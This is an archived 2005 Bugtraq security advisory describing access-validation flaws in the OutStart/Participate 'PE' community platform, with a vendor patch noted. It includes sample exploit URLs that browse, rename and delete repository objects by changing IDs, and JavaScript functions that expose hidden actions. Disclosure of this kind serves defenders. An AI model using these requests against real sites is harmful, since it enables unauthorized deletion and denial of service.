lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <20050308073011.16112.qmail@www.securityfocus.com>
Date: 8 Mar 2005 07:30:11 -0000
From: Altrus Wollesen <root@...our.ca>
To: bugtraq@...urityfocus.com
Subject: PE Multiple Remote Access Validation Vulnerabilities (Participate
    Systems Inc. / Outstart Inc.)




--------------------------------------------------------
- Multiple Remote Access Validation Vulnerabilities
- With PE (community software)
--------------------------------------------------------
(Altrus::security.honour.ca)

Program name: PE
  
Versions affected: <unknown>


Vendor(s):	Outstart Inc.
		Participate Systems Inc.

Vendor Notification Date: 23 FEB 2005

Risk: Moderately Serious
Impact: Denial of Service, File Upload


Vendor Homepages:  http://www.outstart.com
	   	   http://www.participate.com

---------------------------------------------------------
- Description
---------------------------------------------------------

PE is a proprietary java-based community that mimics the 
functionality provided by existing open-source software. 
It facilitates community forums, document libraries, 
message boards, user interaction and an user management 
infrastructure.


>From vendor site:

Available as either a hosted or installed solution, 
OutStart Participate is improving the collaboration and 
knowledge-sharing capabilities of many world-class 
companies, including GE Healthcare, Caremark, palmOne, 
Logitech, McGraw-Hill and Tivo. OutStart Participate 
combines three different systems into one powerful 
knowledge-sharing platform.


---------------------------------------------------------
- Discussion
---------------------------------------------------------

The software is affected by an Access Validation Error 
that could allow a malicious users to rename or delete 
critical directory objects. This could result in a denial 
of service of all library, forum, and/or specialized 
content until the directory objects were restored or 
renamed appropriately.


The Vendor has been notified of this issue, and has 
developed a patch. Sites and persons using the software 
are advised to install the patch - available from the 
vendor.

---------------------------------------------------------
- Sample Exploit Code
---------------------------------------------------------

http://www.targetsite.com/pe/repository/displaynavigator.jsp?rootFolder=101
	-Allows an attacker to browse a limited directory tree (in this case, the action directory. Changing to "rootFolder=105" allows for the document library to be browsed.
		
http://www.targetsite.com/pe/repository/include/renamepopup.jsp?selectedObject=101
	-Allows an attacker to rename the selected object ID (in this case,	the action directory).

http://www.targetsite.com/pe/repository/displaydeletenavigator.jsp?selectedObjectsCSV=101
	-Sets the object CSV for the delete navigator.

The following javascript commands might also be used to 
call functions otherwise unavailable to the user:

showDeleteView()
showWebFolderView()
showLibraryView()
showMyLibraryView()
singleSelectObject(objid)
processRadioSelection(radio, objid)
processCheckboxSelection(chkbox, objid)
singleSelectObject(objid)
addToSelectedObjects(objid)
removeFromSelectedObjects(objid)

---------------------------------------------------------
- Solutions
---------------------------------------------------------

The vendor has provided a patch. Its effectiveness is 
not confirmed, nor is its distribution.

---------------------------------------------------------
- References
---------------------------------------------------------

Authorative and updated copies of this vulnerability can 
be found at:

http://security.honour.ca

---------------------------------------------------------
- Credits
---------------------------------------------------------

Discovered by: Altrus [root@...our.ca]

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ